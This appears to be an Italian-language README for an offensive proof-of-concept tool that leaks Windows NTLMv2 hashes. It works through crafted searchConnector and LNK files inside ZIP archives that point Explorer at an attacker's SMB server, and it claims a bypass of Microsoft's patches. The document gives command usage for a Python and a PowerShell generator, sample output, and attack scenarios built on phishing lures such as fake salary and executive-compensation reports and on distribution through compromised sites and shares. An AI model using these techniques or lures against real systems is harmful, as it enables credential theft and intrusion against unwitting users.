
Windows File Explorer: divulgazione hash NTLMv2-SSP a zero click
Clicca sull'immagine sopra per vedere la dimostrazione della vulnerabilità
Il problema di sicurezza fondamentale risiede nel processamento automatico di Windows Shell di percorsi UNC incorporati in specifici formati file durante le operazioni di anteprima. Quando gli utenti aprono archivi ZIP contenenti file appositamente creati, Windows Explorer risolve automaticamente i percorsi UNC senza il consenso dell'utente, avviando tentativi di autenticazione SMB e esponendo gli hash NTLMv2-SSP a server controllati dall'attaccante.
File: ntlm-disclosure-poc.py
Questa implementazione iniziale sfrutta i file Windows Search Connector (.searchConnector-ms), che sono file di configurazione basati su XML che definiscono le posizioni di ricerca per Windows Explorer. La vulnerabilità si attiva quando Windows elabora automaticamente il percorso UNC incorporato nell'elemento simpleLocation durante le operazioni di anteprima dell'archivio ZIP.
Caratteristiche Tecniche:
searchConnectorDescriptionFile: patch_bypass.ps1
Questa tecnica avanzata affronta la patch iniziale di Microsoft sfruttando le proprietà dei file LNK. L'attacco sfrutta il comportamento di Windows Explorer di recuperare i metadati delle icone e risolvere i percorsi di destinazione durante l'anteprima dei file ZIP, mantenendo il vettore di sfruttamento a zero click attraverso un'attenta configurazione delle proprietà.
Caratteristiche Tecniche:
TargetPath3.6+colorama5.1+Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser# Basic usage
python ntml-disclosure-poc.py 192.168.1.100
# With custom output file
python ntml-disclosure-poc.py 192.168.1.100 -o some_data.zip
# Example output
[+] Listener: 192.168.1.100
[*] Resource path: \\192.168.1.100\sharedir
[*] COMPLETE Package: Project_20241125_143022.zip
[*] Output: PATH\Project_20251123_175037.zip
Parameters
target (required): Target IP address or hostname
-o, --output: Custom output filename for ZIP package
# Basic usage - LNK file auto-removed
.\bypass.ps1 -IP 192.168.1.100
# Keep LNK file for external distribution
.\bypass.ps1 -IP 192.168.1.100 -KeepLnk
# Custom lure name and share
.\bypass.ps1 -IP 192.168.1.100 -Share documents -File budget.xlsx -Lure FileName" -KeepLnk
# Specify output directory
.\bypass.ps1 -IP 192.168.1.100 -OutDir "C:\Payloads" -KeepLnk
Parametri
-IP (obbligatorio): Indirizzo IP del server SMB di destinazione
-Share: Nome della condivisione SMB (default: 'share')
-File: Nome del file di destinazione (default: 'payload.exe')
-Lure: Nome file di social engineering (default: 'Your_File_For_Payload_Here')
-OutDir: Directory di output (default: directory corrente)
-KeepLnk: Mantieni file LNK dopo la creazione ZIP
graph TD
A[🔴 CVE-2025-24054<br/>Initial Vulnerability] --> B[🛡️ Microsoft Patch]
B --> C[🟠 CVE-2025-50154<br/>Bypass #1]
C --> D[🛡️ Microsoft Patch]
D --> E[🟡 CVE-2025-59214<br/>Bypass #2]
E --> F[🔴 Current State<br/>Active Exploitation]
style A fill:#ffcccc
style C fill:#ffddcc
style E fill:#ffffcc
style F fill:#ccffcc
📨 Scenario 1: Distribuzione ZIP Diretta
# Create ZIP payload
.\bypass.ps1 -IP 192.168.1.100 -Lure "Salary_Report_Q4_2025"
# Distribution vectors:
# - 📧 Email attachments with social engineering lures
# - ☁️ Compromised file sharing services
# - 🌐 Network share drops in enterprise environments
🔄 Scenario 2: Trasferimento File LNK
# Create and preserve LNK file for multi-host deployment
.\bypass.ps1 -IP 192.168.1.100 -Lure "Project_Documentation" -KeepLnk
# Cross-host deployment:
copy-item "Project_Documentation.lnk" "\\remote-server\share\"
# Web-based distribution via compromised sites
🎯 Scenario 3: Social Engineering Mirato
.\bypass.ps1 -IP 192.168.1.100 -Share "HR_Documents" -File "compensation_review.xlsx" -Lure "Executive_Compensation_2025" -KeepLnk
- Group & Contact: t.me/initial_persistence
- Email: [email protected]
| Vettore | Meccanismo di attivazione | Interazione utente | Stato patch |
|---|
| 🔗 SearchConnector | Parsing XML + risoluzione UNC | Apertura ZIP | 🛡️ Corretto |
| 📎 LNK TargetPath | Recupero metadati icona | Apertura ZIP | 🔴 Attivo |